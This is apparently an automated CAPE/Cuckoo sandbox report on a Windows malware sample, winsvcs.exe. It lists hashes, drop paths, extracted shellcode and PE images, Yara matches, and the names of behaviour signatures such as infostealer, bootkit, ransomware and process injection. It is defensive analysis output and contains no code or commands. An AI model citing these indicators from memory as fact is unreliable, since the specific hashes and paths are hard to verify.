SHA1 bc429685689a09fbb7eac5814899425cb0fe6322
SHA256 8c20cc2cb85cf646e618be7453c6bb7e3e4837a23013c78320feec11ab7d8383
CRC32 4EF87629
Ssdeep 6:idqgHVg3F+X32r0fRtBLRaTwa/PqkYdwWTcgWtCtQUelICPLM0S+8spF:e31GSGIRtBtgPqkYd3Tc26lIC40S+8sr
ClamAV None
Yara None matched
CAPE Yara None matched
File name winsvcs.exe
Associated Filenames
C:\Windows\806084767800850\winsvcs.exe
File Size 539648 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 cb9d7ff8deb972b96917e88e0d56adac
SHA1 8ca2b46c42c7b413e9a24bdf2790f9260af0facf
SHA256 c2cb48209e590289e62a2e461ef9b00078b104aa359bdc02b64c695c9eb8cd27
CRC32 2161DC8B
Ssdeep 3072:G7UpE9lqoZ/WLpwsUPg7YSU2RrygKjFvwwwwwwlwwwwww2wwww4ByXrMlseFaEkX:G7V93ZeLpw1eU2RrygKFErMeeF3k
ClamAV None
Yara None matched
CAPE Yara None matched
Type Extracted Shellcode
Size 205410 bytes
Virtual Address 0x4f0000
Process BdTTBslVE5X4r.exe
PID 2952
Path C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe
MD5 883ebc589353652b1c425eb3afff1a95
SHA1 af02e7c258cd81420cfe7824f221075eba01d83e
SHA256 9277a8a8e9c09dcd10a00e67604c3bd6aa84ad150ac73d3d292367e2c0158b40
CRC32 D48A4079
Ssdeep 1536:1YpguYxm1HYviUJmS5b/eFvn00ctHxfuVl6vUc+9xZ0f3:nCHY0Cb/Wvn006lu6D+/ZU3
Yara
  • embedded_pe - Contains an embedded PE32 file
  • shellcode - Matched shellcode byte patterns
CAPE Yara None matched
Type Extracted PE Image: 32-bit executable
Size 156160 bytes
Virtual Address 0x400000
Process BdTTBslVE5X4r.exe
PID 2952
Path C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe
MD5 dcad1d94c50b383ba2ec46c2c38738b5
SHA1 8ad8a63d10da24639bf01d32ed7cf5f39ffd04a4
SHA256 b6ab43b7b732eda8366fcd3e5cfb96d97139d2a1b17fad3645163d197459c451
CRC32 2AFEC6DC
Ssdeep 3072:jupWc+2g2yM2BSwgxUNSGv5P1Uhb/Wvn006lutLHE:jupxMcBWSGjUhbuvn00c
Yara None matched
CAPE Yara None matched
Type Extracted Shellcode
Size 205322 bytes
Virtual Address 0x4c0000
Process winsvcs.exe
PID 2908
Path C:\Windows\495060393034060\winsvcs.exe
MD5 023a58ac5d4a8e4aedc1a64f7f95c306
SHA1 57f4e853f1e5f6cf31670064c98b7d9b46300e10
SHA256 8ff23585693116caa99d6acbbfddd0b1ec2f05438bf40a5597b3af24557131dc
CRC32 930009DD
Ssdeep 1536:svjSZYMMBNDJsb/eFvn00ctHxfu+l6vUc+9xZ0f3:CSqdBPsb/Wvn006luFD+/ZU3
Yara
  • embedded_pe - Contains an embedded PE32 file
  • shellcode - Matched shellcode byte patterns
CAPE Yara None matched
Type Extracted Shellcode
Size 204193 bytes
Virtual Address 0x4f0000
Process 3895820593.exe
PID 2776
Path C:\Users\user\AppData\Local\Temp\3895820593.exe
MD5 b305c7e53d24e69055477e06e9528b93
SHA1 e5b4341a79e791148911261bf79236b06d6ca995
SHA256 3f640be0963058dce85004d0897b8c213112bde35415583c93912bf0255eea51
CRC32 C0020D85
Ssdeep 3072:CBFxL5d98qaklq3BeqVVjvFjVaGTChnsUP9DKbZ+:xLrVFehn1VDKbZ+
Yara
  • embedded_pe - Contains an embedded PE32 file
  • shellcode - Matched shellcode byte patterns
CAPE Yara None matched
Type Extracted PE Image: 32-bit executable
Size 540672 bytes
Virtual Address 0x400000
Process 3895820593.exe
PID 2776
Path C:\Users\user\AppData\Local\Temp\3895820593.exe
MD5 336b30fc4d9468a5f8165b2ff7b1926a
SHA1 d8fde0c148038f1224bb1955712824f683395d87
SHA256 1b65f899baabe9a0fb477319161d7ca4df758bf739cb50ae3519a37ea2bf5218
CRC32 8F90A919
Ssdeep 3072:T7UpE9lqoZ/WLpwsUPt7YoD2RrySK1Fvwwwwwwlwwwwww2wwww4ByXrMlseFaEkX:T7V93ZeLpw1RD2RrySKPErMeeF3k
Yara None matched
CAPE Yara None matched
Type Extracted Shellcode
Size 206137 bytes
Virtual Address 0x600000
Process winsvcs.exe
PID 3068
Path C:\Windows\806084767800850\winsvcs.exe
MD5 6cccf05388952611ce29a9b784b8d31b
SHA1 4c12cace9a6d0a2a4e649f87a0577fa08784c036
SHA256 9d222e19277b628afcec3f3c0f8a937c67dc3806358b44b60dc28a442feab9cb
CRC32 BCF590A0
Ssdeep 1536:VwC9aaztUEJdkn+HZ8sIbPgJEl3vUcK9RZ0pT:Vwaaaz+EXkTsUPdDKbZ+
Yara
  • embedded_pe - Contains an embedded PE32 file
  • shellcode - Matched shellcode byte patterns
CAPE Yara None matched
Type Extracted Shellcode
Size 204193 bytes
Virtual Address 0x8b0000
Process 3971618177.exe
PID 2936
Path C:\Users\user\AppData\Local\Temp\3971618177.exe
MD5 12f0d35c1054bd32620f6b788bd0a1ac
SHA1 384273da26ec1e8dd79119efb13ef4ab0999d433
SHA256 488c15b5476f08c3e9aa631f425c545d7248baf98fa3451b49611804f9227aab
CRC32 3F183D21
Ssdeep 1536:2T/Khjs879o9eRic1qd3iHZ8sIbPgJDl3vUcK9RZ0pT:AEs879osMsUPADKbZ+
Yara
  • embedded_pe - Contains an embedded PE32 file
  • shellcode - Matched shellcode byte patterns
CAPE Yara None matched
Type Extracted Shellcode
Size 206137 bytes
Virtual Address 0x5d0000
Process winsvcs.exe
PID 2744
Path C:\Windows\806084767800850\winsvcs.exe
MD5 eccbac6cfb1451551b51154cb46217a5
SHA1 48c97d765ee7adc307206de0cb1273cfa49e1a14
SHA256 d09dba796f0449568c1fd2346277c43b3319f38d1580b341a55eff06e1bf3054
CRC32 55D38406
Ssdeep 1536:+7sJCbxqBvxnt/HZ8sIbPgJ/l3vUcK9RZ0pT:k8CbxsxtGsUPADKbZ+
Yara
  • embedded_pe - Contains an embedded PE32 file
  • shellcode - Matched shellcode byte patterns
CAPE Yara None matched
Type Extracted Shellcode
Size 204193 bytes
Virtual Address 0x570000
Process 1015321578.exe
PID 2612
Path C:\Users\user\AppData\Local\Temp\1015321578.exe
MD5 06e77eefead25439a36cbdc8e550cb9a
SHA1 16af922d38659643d6f8804816471de486a12bb8
SHA256 79bd61c78b2aaffd1b097bdd365e66c3209503da8b8df51d05dc85183dd1a5dc
CRC32 9E690C68
Ssdeep 1536:5l7eIk7ARnx3qHZ8sIbPgJ1l3vUcK9RZ0pT:HVkSsUPeDKbZ+
Yara
  • embedded_pe - Contains an embedded PE32 file
  • shellcode - Matched shellcode byte patterns
CAPE Yara None matched
Sorry! No process dumps.

Processing ( 54.682 seconds )

  • 48.341 BehaviorAnalysis
  • 3.864 CAPE
  • 0.717 NetworkAnalysis
  • 0.71 Static
  • 0.642 Dropped
  • 0.205 TargetInfo
  • 0.096 Deduplicate
  • 0.09 TrID
  • 0.01 Strings
  • 0.005 AnalysisInfo
  • 0.001 Debug
  • 0.001 config_decoder

Signatures ( 24.29 seconds )

  • 4.973 antivm_generic_disk
  • 3.481 bootkit
  • 2.689 stealth_timeout
  • 2.304 mimics_filetime
  • 1.961 decoy_document
  • 1.82 virus
  • 1.758 reads_self
  • 1.729 stealth_file
  • 1.657 api_spamming
  • 1.578 hancitor_behavior
  • 0.072 webmail_phish
  • 0.042 secure_login_phish
  • 0.038 generic_phish
  • 0.025 network_document_http
  • 0.023 stealth_network
  • 0.02 antisandbox_sleep
  • 0.019 wscript_downloader_http
  • 0.01 antiav_detectreg
  • 0.004 malicious_dynamic_function_loading
  • 0.004 antiemu_wine_func
  • 0.004 dynamic_function_loading
  • 0.004 persistence_autorun
  • 0.004 kovter_behavior
  • 0.004 antiav_detectfile
  • 0.004 infostealer_ftp
  • 0.004 ransomware_files
  • 0.003 Doppelganging
  • 0.003 infostealer_browser_password
  • 0.003 securityxploded_modules
  • 0.003 infostealer_bitcoin
  • 0.003 infostealer_im
  • 0.003 network_torgateway
  • 0.003 ransomware_extensions
  • 0.002 exploit_getbasekerneladdress
  • 0.002 sets_autoconfig_url
  • 0.002 exploit_gethaldispatchtable
  • 0.002 antivm_vbox_libs
  • 0.002 ransomware_message
  • 0.002 antianalysis_detectreg
  • 0.002 modify_proxy
  • 0.002 browser_security
  • 0.002 infostealer_mail
  • 0.001 mimics_agent
  • 0.001 tinba_behavior
  • 0.001 disables_spdy
  • 0.001 rat_nanocore
  • 0.001 injection_createremotethread
  • 0.001 InjectionCreateRemoteThread
  • 0.001 ipc_namedpipe
  • 0.001 InjectionProcessHollowing
  • 0.001 exec_crash
  • 0.001 disables_wfp
  • 0.001 cerber_behavior
  • 0.001 injection_runpe
  • 0.001 multiple_useragents
  • 0.001 antianalysis_detectfile
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 bot_drive
  • 0.001 disables_browser_warn
  • 0.001 recon_checkip

Reporting ( 0.125 seconds )

  • 0.125 CompressResults
Task ID 29487
Mongo ID 5c36c01cf28488708c457046
Cuckoo release 1.3-CAPE